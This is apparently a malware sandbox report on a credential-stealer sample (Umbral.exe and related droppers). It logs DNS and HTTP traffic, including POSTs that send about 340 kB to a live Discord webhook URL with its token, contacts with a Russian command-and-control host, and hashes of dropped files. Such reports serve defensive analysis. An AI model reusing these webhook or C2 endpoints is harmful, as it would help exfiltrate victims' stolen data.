          IN A
          162.159.136.232
          discord.com
          IN A
          162.159.138.232
          discord.com
          IN A
          162.159.137.232
        • flag-us
          POST
          https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ
          Umbral.exe
          Remote address:
          162.159.128.233:443
          Request
          POST /api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ HTTP/1.1
          Accept: application/json
          User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
          Content-Type: application/json; charset=utf-8
          Host: discord.com
          Content-Length: 941
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 204 No Content
          Date: Fri, 17 May 2024 20:41:27 GMT
          Content-Type: text/html; charset=utf-8
          Connection: keep-alive
          set-cookie: __dcfduid=d579be5a148d11efa4a1ea730e45241a; Expires=Wed, 16-May-2029 20:41:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
          x-ratelimit-limit: 5
          x-ratelimit-remaining: 4
          x-ratelimit-reset: 1715978488
          x-ratelimit-reset-after: 1
          via: 1.1 google
          alt-svc: h3=":443"; ma=86400
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKqUXEI9FBKbNVNvIKJqFavgiDAfX%2FEVk58AfAM8ovcHYciosRruYFWFIyg4x%2BU7Ozw7CQCRB9LYb17FAUT62QoiDi%2F8vNAsgf5bQbhLjtbEB82wpuLEKdf9uxnA"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          X-Content-Type-Options: nosniff
          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
          Set-Cookie: __sdcfduid=d579be5a148d11efa4a1ea730e45241a75557535158e6d9c61309e13f31ac86aef87e9668b3290eeb6a49fd6018412fc; Expires=Wed, 16-May-2029 20:41:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
          Set-Cookie: __cfruid=bb69fbf806994cc378399a58956bff492d0a0137-1715978487; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
          Set-Cookie: _cfuvid=wp9LJ0nQZ7GRugXk5Sr5yzdtRbDHnt5KcMzrbDJsWNQ-1715978487672-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
          Server: cloudflare
          CF-RAY: 88566da9fb76240e-LHR
        • flag-us
          POST
          https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ
          Umbral.exe
          Remote address:
          162.159.128.233:443
          Request
          POST /api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ HTTP/1.1
          Accept: application/json
          User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
          Content-Type: multipart/form-data; boundary="e0e3ec5c-5276-4798-b82a-f627bee59bf8"
          Host: discord.com
          Cookie: __dcfduid=d579be5a148d11efa4a1ea730e45241a; __sdcfduid=d579be5a148d11efa4a1ea730e45241a75557535158e6d9c61309e13f31ac86aef87e9668b3290eeb6a49fd6018412fc; __cfruid=bb69fbf806994cc378399a58956bff492d0a0137-1715978487; _cfuvid=wp9LJ0nQZ7GRugXk5Sr5yzdtRbDHnt5KcMzrbDJsWNQ-1715978487672-0.0.1.1-604800000
          Content-Length: 328880
          Expect: 100-continue
          Response
          HTTP/1.1 200 OK
          Date: Fri, 17 May 2024 20:41:28 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: keep-alive
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
          x-ratelimit-limit: 5
          x-ratelimit-remaining: 4
          x-ratelimit-reset: 1715978489
          x-ratelimit-reset-after: 1
          vary: Accept-Encoding
          via: 1.1 google
          alt-svc: h3=":443"; ma=86400
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jw6PlB6jBoQlJyXdcxXpcX835RIA%2BVimcFqNuQ5wdFwDNsuXAFJABITwoIZr%2BT%2F7gSZUwzg5fiwhBd6vuW%2FRSk9LXfyuaE8b%2BfMzEF9II1Q%2FVz7jQFLGv6uuY04D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          X-Content-Type-Options: nosniff
          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
          Server: cloudflare
          CF-RAY: 88566dac1e84240e-LHR
        • flag-us
          DNS
          233.128.159.162.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          233.128.159.162.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          71.159.190.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          71.159.190.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          57.169.31.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          57.169.31.20.in-addr.arpa
          IN PTR
          Response
        • flag-be
          GET
          https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
          Remote address:
          2.17.107.122:443
          Request
          GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
          host: www.bing.com
          accept: */*
          cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA; MSPTC=Wbl7qRrr9oHR3dLn--kdfNrAbX_j2225WJUFnGXmoSQ
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-type: image/png
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          content-length: 1107
          date: Fri, 17 May 2024 20:41:29 GMT
          alt-svc: h3=":443"; ma=93600
          x-cdn-traceid: 0.766b1102.1715978489.60057ece
        • flag-us
          DNS
          122.107.17.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          122.107.17.2.in-addr.arpa
          IN PTR
          Response
          122.107.17.2.in-addr.arpa
          IN PTR
          a2-17-107-122deploystaticakamaitechnologiescom
        • flag-us
          DNS
          a0948305.xsph.ru
          StartMenuExperienceHost.exe
          Remote address:
          8.8.8.8:53
          Request
          a0948305.xsph.ru
          IN A
          Response
          a0948305.xsph.ru
          IN A
          141.8.192.103
        • flag-ru
          GET
          http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF
          StartMenuExperienceHost.exe
          Remote address:
          141.8.192.103:80
          Request
          GET /_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
          Accept: */*
          Content-Type: application/json
          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
          Host: a0948305.xsph.ru
          Connection: Keep-Alive
          Response
          HTTP/1.1 403 Forbidden
          Server: openresty
          Date: Fri, 17 May 2024 20:41:33 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: keep-alive
          Vary: Accept-Encoding
        • flag-ru
          GET
          http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF
          StartMenuExperienceHost.exe
          Remote address:
          141.8.192.103:80
          Request
          GET /_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
          Accept: */*
          Content-Type: application/json
          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
          Host: a0948305.xsph.ru
          Response
          HTTP/1.1 403 Forbidden
          Server: openresty
          Date: Fri, 17 May 2024 20:41:33 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: keep-alive
          Vary: Accept-Encoding
        • flag-us
          DNS
          103.192.8.141.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          103.192.8.141.in-addr.arpa
          IN PTR
          Response
          103.192.8.141.in-addr.arpa
          IN PTR
          hnossfromsh
        • flag-us
          DNS
          157.123.68.40.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          157.123.68.40.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          18.31.95.13.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          18.31.95.13.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          172.210.232.199.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          172.210.232.199.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          144.107.17.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          144.107.17.2.in-addr.arpa
          IN PTR
          Response
          144.107.17.2.in-addr.arpa
          IN PTR
          a2-17-107-144deploystaticakamaitechnologiescom
        • flag-us
          DNS
          19.229.111.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          19.229.111.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          26.35.223.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          26.35.223.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          30.73.42.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          30.73.42.20.in-addr.arpa
          IN PTR
          Response
        • 172.217.16.227:443
          https://gstatic.com/generate_204
          tls, http
          Umbral.exe
          868 B
          5.4kB
          11
          10

          HTTP Request

          GET https://gstatic.com/generate_204

          HTTP Response

          204
        • 208.95.112.1:80
          http://ip-api.com/line/?fields=hosting
          http
          Umbral.exe
          310 B
          267 B
          5
          2

          HTTP Request

          GET http://ip-api.com/line/?fields=hosting

          HTTP Response

          200
        • 208.95.112.1:80
          http://ip-api.com/line/?fields=hosting
          http
          LoaderMas.exe
          310 B
          387 B
          5
          5

          HTTP Request

          GET http://ip-api.com/line/?fields=hosting

          HTTP Response

          200
        • 208.95.112.1:80
          http://ip-api.com/json/?fields=225545
          http
          Umbral.exe
          285 B
          512 B
          5
          4

          HTTP Request

          GET http://ip-api.com/json/?fields=225545

          HTTP Response

          200
        • 204.79.197.237:443
          https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=
          tls, http2
          2.0kB
          9.2kB
          21
          18

          HTTP Request

          GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

          HTTP Response

          204

          HTTP Request

          GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

          HTTP Response

          204

          HTTP Request

          GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

          HTTP Response

          204
        • 162.159.128.233:443
          https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ
          tls, http
          Umbral.exe
          342.3kB
          11.2kB
          258
          114

          HTTP Request

          POST https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

          HTTP Response

          204

          HTTP Request

          POST https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

          HTTP Response

          200
        • 2.17.107.122:443
          https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
          tls, http2
          1.5kB
          6.4kB
          16
          12

          HTTP Request

          GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

          HTTP Response

          200
        • 141.8.192.103:80
          http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF
          http
          StartMenuExperienceHost.exe
          3.1kB
          118.5kB
          47
          88

          HTTP Request

          GET http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF

          HTTP Response

          403

          HTTP Request

          GET http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF

          HTTP Response

          403
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 8.8.8.8:53
          154.239.44.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          154.239.44.20.in-addr.arpa

        • 8.8.8.8:53
          105.83.221.88.in-addr.arpa
          dns
          72 B
          137 B
          1
          1

          DNS Request

          105.83.221.88.in-addr.arpa

        • 8.8.8.8:53
          gstatic.com
          dns
          Umbral.exe
          57 B
          73 B
          1
          1

          DNS Request

          gstatic.com

          DNS Response

          172.217.16.227

        • 8.8.8.8:53
          ip-api.com
          dns
          LoaderMas.exe
          56 B
          72 B
          1
          1

          DNS Request

          ip-api.com

          DNS Response

          208.95.112.1

        • 8.8.8.8:53
          227.16.217.172.in-addr.arpa
          dns
          73 B
          140 B
          1
          1

          DNS Request

          227.16.217.172.in-addr.arpa

        • 8.8.8.8:53
          1.112.95.208.in-addr.arpa
          dns
          71 B
          95 B
          1
          1

          DNS Request

          1.112.95.208.in-addr.arpa

        • 8.8.8.8:53
          76.32.126.40.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          76.32.126.40.in-addr.arpa

        • 8.8.8.8:53
          97.17.167.52.in-addr.arpa
          dns
          71 B
          145 B
          1
          1

          DNS Request

          97.17.167.52.in-addr.arpa

        • 8.8.8.8:53
          ip-api.com
          dns
          LoaderMas.exe
          56 B
          72 B
          1
          1

          DNS Request

          ip-api.com

          DNS Response

          208.95.112.1

        • 8.8.8.8:53
          g.bing.com
          dns
          56 B
          151 B
          1
          1

          DNS Request

          g.bing.com

          DNS Response

          204.79.197.237
          13.107.21.237

        • 8.8.8.8:53
          237.197.79.204.in-addr.arpa
          dns
          73 B
          143 B
          1
          1

          DNS Request

          237.197.79.204.in-addr.arpa

        • 8.8.8.8:53
          discord.com
          dns
          Umbral.exe
          57 B
          137 B
          1
          1

          DNS Request

          discord.com

          DNS Response

          162.159.128.233
          162.159.135.232
          162.159.136.232
          162.159.138.232
          162.159.137.232

        • 8.8.8.8:53
          233.128.159.162.in-addr.arpa
          dns
          74 B
          136 B
          1
          1

          DNS Request

          233.128.159.162.in-addr.arpa

        • 8.8.8.8:53
          71.159.190.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          71.159.190.20.in-addr.arpa

        • 8.8.8.8:53
          57.169.31.20.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          57.169.31.20.in-addr.arpa

        • 8.8.8.8:53
          122.107.17.2.in-addr.arpa
          dns
          71 B
          135 B
          1
          1

          DNS Request

          122.107.17.2.in-addr.arpa

        • 8.8.8.8:53
          a0948305.xsph.ru
          dns
          StartMenuExperienceHost.exe
          62 B
          78 B
          1
          1

          DNS Request

          a0948305.xsph.ru

          DNS Response

          141.8.192.103

        • 8.8.8.8:53
          103.192.8.141.in-addr.arpa
          dns
          72 B
          99 B
          1
          1

          DNS Request

          103.192.8.141.in-addr.arpa

        • 8.8.8.8:53
          157.123.68.40.in-addr.arpa
          dns
          72 B
          146 B
          1
          1

          DNS Request

          157.123.68.40.in-addr.arpa

        • 8.8.8.8:53
          18.31.95.13.in-addr.arpa
          dns
          70 B
          144 B
          1
          1

          DNS Request

          18.31.95.13.in-addr.arpa

        • 8.8.8.8:53
          172.210.232.199.in-addr.arpa
          dns
          74 B
          128 B
          1
          1

          DNS Request

          172.210.232.199.in-addr.arpa

        • 8.8.8.8:53
          144.107.17.2.in-addr.arpa
          dns
          71 B
          135 B
          1
          1

          DNS Request

          144.107.17.2.in-addr.arpa

        • 8.8.8.8:53
          19.229.111.52.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          19.229.111.52.in-addr.arpa

        • 8.8.8.8:53
          26.35.223.20.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          26.35.223.20.in-addr.arpa

        • 8.8.8.8:53
          30.73.42.20.in-addr.arpa
          dns
          70 B
          156 B
          1
          1

          DNS Request

          30.73.42.20.in-addr.arpa

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          985b3105d8889886d6fd953575c54e08

          SHA1

          0f9a041240a344d82bac0a180520e7982c15f3cd

          SHA256

          5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

          SHA512

          0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          6d42b6da621e8df5674e26b799c8e2aa

          SHA1

          ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

          SHA256

          5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

          SHA512

          53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          d8cb3e9459807e35f02130fad3f9860d

          SHA1

          5af7f32cb8a30e850892b15e9164030a041f4bd6

          SHA256

          2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

          SHA512

          045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          0256bd284691ed0fc502ef3c8a7e58dc

          SHA1

          dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

          SHA256

          e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

          SHA512

          c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          ba169f4dcbbf147fe78ef0061a95e83b

          SHA1

          92a571a6eef49fff666e0f62a3545bcd1cdcda67

          SHA256

          5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

          SHA512

          8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          52afa702b34ab802e2ecd71d9539c829

          SHA1

          6a6f18158c82910e158d7e27972486c6e4dc5c93

          SHA256

          992fefff5236c174b6dd74b76a2c5c0d33470bec786ee4b30f5577aea27b8025

          SHA512

          5e42fead63b34fb62e4173e83e11110543583aece41f736c007d8512e8f23b6713140c9233bf99f9b9d1c3302a2f526bd4d33ed1ce1f777c9e0d9dea25e37639

        • C:\Users\Admin\AppData\Local\Temp\OOOQfReeqn.bat

          Filesize

          207B

          MD5

          e78f932d0eff4899edfc22da5cc43704

          SHA1

          4915fa24356875484286faa7e551dda9cf9307a2

          SHA256

          476251c5b0021bb2ecbe2f051dc83d31f48df444f1067cf093742e69dadf504f

          SHA512

          4b7b2efc604267663b34784b189bd1e91d9453d7c1fa1a4bc721357fad332bed46573ce854c55dd25fff018187195c79ac1886d895abb9d44ce2a78ed5d8ffe4

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eveoqp2p.ozg.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\LoaderMas.exe

          Filesize

          63KB

          MD5

          a0dbdf3af38ead2237ccb781a098a431

          SHA1

          1434296af6c5530eb036718e860490e0adc3321a

          SHA256

          6f483da6b36646bf6f33db0c210bd3683ff29428a44d916a2f26a4240c1a9901

          SHA512

          dd7dc91a2e09b0c3906efbb486fb84d0289dc61338afd75d203f1ab2f49556c9523a8a9abc913363a45dde8194f5b2ee9d3d659807250047331944c39006edc3

        • C:\Users\Admin\AppData\Roaming\Nursultan (17).exe

          Filesize

          18.2MB

          MD5

          ed965403e795c3b563d67c734472ad93

          SHA1

          6b8b929239d5ef8f1f546c591c67acaf560de4dc

          SHA256

          6b7473e7177ef0666f6afe36b257d0730dababefc209ee1c5f2da319dbe1633d

          SHA512

          bd860103c5ac1bcc02bfefc669616a1b0103dfb3c611b0e4499cf4b1fc67d49c9cd57c1839936b75e0f0008aec0f84cb0af712feb334957972661405a137f649

        • C:\Users\Admin\AppData\Roaming\Nursultan.exe

          Filesize

          17.9MB

          MD5

          e504e3fc36fe4d6f182c98923979a779

          SHA1

          3ba9f1a9a15b79639a20cfcf79c9de31d15a17a6

          SHA256

          70b7b95bb952b3325476867307fc5bd4df5769b97bbcdd8b60e7b46e1b38e4a0

          SHA512

          63bbbc3ccf14b2846df64b8edae52b6431df52aa9e03569a28ca239ab02db94bf79ca8a0a30529e35a04ee5845768d752b99e6ce3830ab440c57850180ad1647

        • C:\Users\Admin\AppData\Roaming\Umbral.exe

          Filesize

          229KB

          MD5

          f48ef033300ec9fd3c77afff5c20e95f

          SHA1

          22d6125b980474b3f54937003a765cdd5352f9a8

          SHA256

          72ee11a905ca278130f02397422b4cc4944851065ce0072f9888b70c5ad40f1e

          SHA512

          847ee8cdb14879089c861168d6be90325304df490668a38447b37772423e6dab5e32a5df344ceb58410d3b24cf25cd7221e8768951e5aca14820996a1e8304bc

        • C:\Users\Admin\AppData\Roaming\t.bat

          Filesize

          1.1MB

          MD5

          d85bd59cf0808fb894f60773e1594a0a

          SHA1

          84b9d205f3ae6ca4f8f1bb938ee8b4d452444cde

          SHA256

          f3ef597673421e514d7fed82b40d65386c3811c4a8f5553afd59fc632bca8746

          SHA512

          225788e3e98449f53e6206c585315a37c9ff6ed0b5425b2a98e50c7ac45ab3c187ccf7626f126ba300bd8dbdf89c864e89f85d6264edc89281745b081ec58f97

        • C:\perfdhcpSvc\Chainprovider.exe

          Filesize

          827KB

          MD5

          d2ec227ddac047e735393e58e742fd44

          SHA1

          7aae5c76378f7cfcff8bb983695fa4c2577a20e2

          SHA256

          0e679527f2df9f87d33c82023256fac276c36006579d2d71877ccab4be847cce

          SHA512

          5a11b292a574bd2ca6c225af1e4c9f95004a49ce816cc59a73d4ab6e2a0b007a58ab56e5e0c004901c3ebe4ec06054e6e801f8e659711856857add6d43f38979

        • C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe

          Filesize

          200B

          MD5

          00b53f3e200522631227cac1a07e0646

          SHA1

          a0c69d58c7ca10f5fd5e1320b1b2f92081d7fcfe

          SHA256

          486c050aadc42906113b0c5c8485dff36b0187f343a732542608a91b0565146c

          SHA512

          22241ae8a31c7e564c9fb652947e4fe17f80c6e94dfe1a3bb5890f6eb97797ee32ccfff5d647eef02bda31bd47c5d95521cd0c6349a01e501e6e064ea6306243

        • C:\perfdhcpSvc\mStUjP0ksX5N.bat

          Filesize

          34B

          MD5

          a9330c6da12d90d5d956ae2bbcf017d7

          SHA1

          7ebaa14eed80db6d9f0c0c0f1ecab1a9c3f61410

          SHA256

          b49853470383dce14680f656aca7ea449b1d6aabb3f18d4165ebd7e3e7545393

          SHA512

